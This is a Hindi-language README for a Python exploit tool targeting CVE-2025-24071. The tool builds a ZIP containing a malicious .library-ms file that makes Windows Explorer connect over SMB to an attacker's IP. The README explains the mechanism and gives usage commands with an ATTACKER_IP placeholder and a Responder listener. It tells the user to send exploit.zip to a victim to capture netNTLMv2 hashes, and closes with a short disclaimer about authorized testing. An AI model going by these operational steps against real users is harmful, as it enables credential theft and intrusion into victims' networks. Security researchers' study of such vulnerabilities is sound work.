
CVE-2025-24071 का उपयोग करके एक ZIP फ़ाइल उत्पन्न करता है जो Windows Explorer से दुर्भावनापूर्ण .library-ms फ़ाइलों के माध्यम से netNTLMv2 क्रेडेंशियल्स को कैप्चर करता है, जो नियंत्रित परीक्षण के लिए है।
यह Python स्क्रिप्ट Windows Explorer में CVE-2025-24071 भेद्यता को प्रदर्शित करने के लिए डिज़ाइन की गई है। यह भेद्यता एक हमलावर को पीड़ित से बिना किसी सीधी बातचीत के netNTLMv2 क्रेडेंशियल्स कैप्चर करने की अनुमति देती है।
CVE-2025-24071 भेद्यता Windows द्वारा ZIP संग्रहों के अंदर .library-ms फ़ाइलों को संभालने के तरीके में मौजूद है। जब एक दुर्भावनापूर्ण .library-ms फ़ाइल वाली ZIP फ़ाइल निकाली जाती है, तो Windows स्वचालित रूप से फ़ाइल में निर्दिष्ट SMB स्थान तक पहुँचने का प्रयास करता है, जिसके परिणामस्वरूप पीड़ित के क्रेडेंशियल्स हमलावर के सर्वर पर उजागर हो सकते हैं।
यह स्क्रिप्ट एक दुर्भावनापूर्ण .library-ms फ़ाइल वाली ZIP फ़ाइल उत्पन्न करती है। जब पीड़ित ZIP फ़ाइल निकालता है, तो सिस्टम स्वचालित रूप से फ़ाइल में निर्दिष्ट SMB स्थान से कनेक्ट करने का प्रयास करता है, जिससे पीड़ित की ओर से किसी भी बातचीत के बिना netNTLMv2 क्रेडेंशियल्स हमलावर को भेजे जाते हैं।
स्क्रिप्ट हमलावर के IP पते को एक तर्क के रूप में लेती है और इसे एक XML फ़ाइल में डालती है जो एक .library-ms फ़ाइल को परिभाषित करती है। यह फ़ाइल Windows को हमलावर के IP पते पर एक साझा संसाधन से कनेक्ट करने का निर्देश देती है।
फिर .library-ms फ़ाइल को exploit.zip नामक ZIP फ़ाइल के अंदर रखा जाता है।
जब पीड़ित ZIP फ़ाइल निकालता है, तो Windows .library-ms फ़ाइल को प्रोसेस करता है और भेद्यता के कारण स्वचालित रूप से हमलावर के सर्वर से SMB कनेक्शन स्थापित करता है।
हमलावर Responder जैसे उपकरणों का उपयोग करके netNTLMv2 क्रेडेंशियल्स कैप्चर कर सकता है, बिना पीड़ित को कोई कार्रवाई करने की आवश्यकता के।
zipfile, os, argparsepython exploit.py --ip <ATTACKER_IP>
responder -I <INTERFACE>
उत्पन्न exploit.zip फ़ाइल को पीड़ित को भेजें। जब वे फ़ाइल निकालते हैं, तो Windows .library-ms फ़ाइल में निर्दिष्ट SMB सर्वर से कनेक्ट करने का प्रयास करेगा।
जब पीड़ित ZIP फ़ाइल निकालता है और Windows SMB कनेक्शन का प्रयास करता है, तो Responder पीड़ित से netNTLMv2 हैश कैप्चर करेगा।
यह स्क्रिप्ट नियंत्रित वातावरण में शैक्षिक और परीक्षण उद्देश्यों के लिए है। इस भेद्यता का दुर्भावनापूर्ण उपयोग अवैध हो सकता है और कई देशों के कानूनों और विनियमों के विरुद्ध हो सकता है। इस स्क्रिप्ट का उपयोग केवल उन सिस्टमों पर करें जिन्हें आपके पास ऑडिट करने की अनुमति है और हमेशा उचित प्राधिकरण के साथ।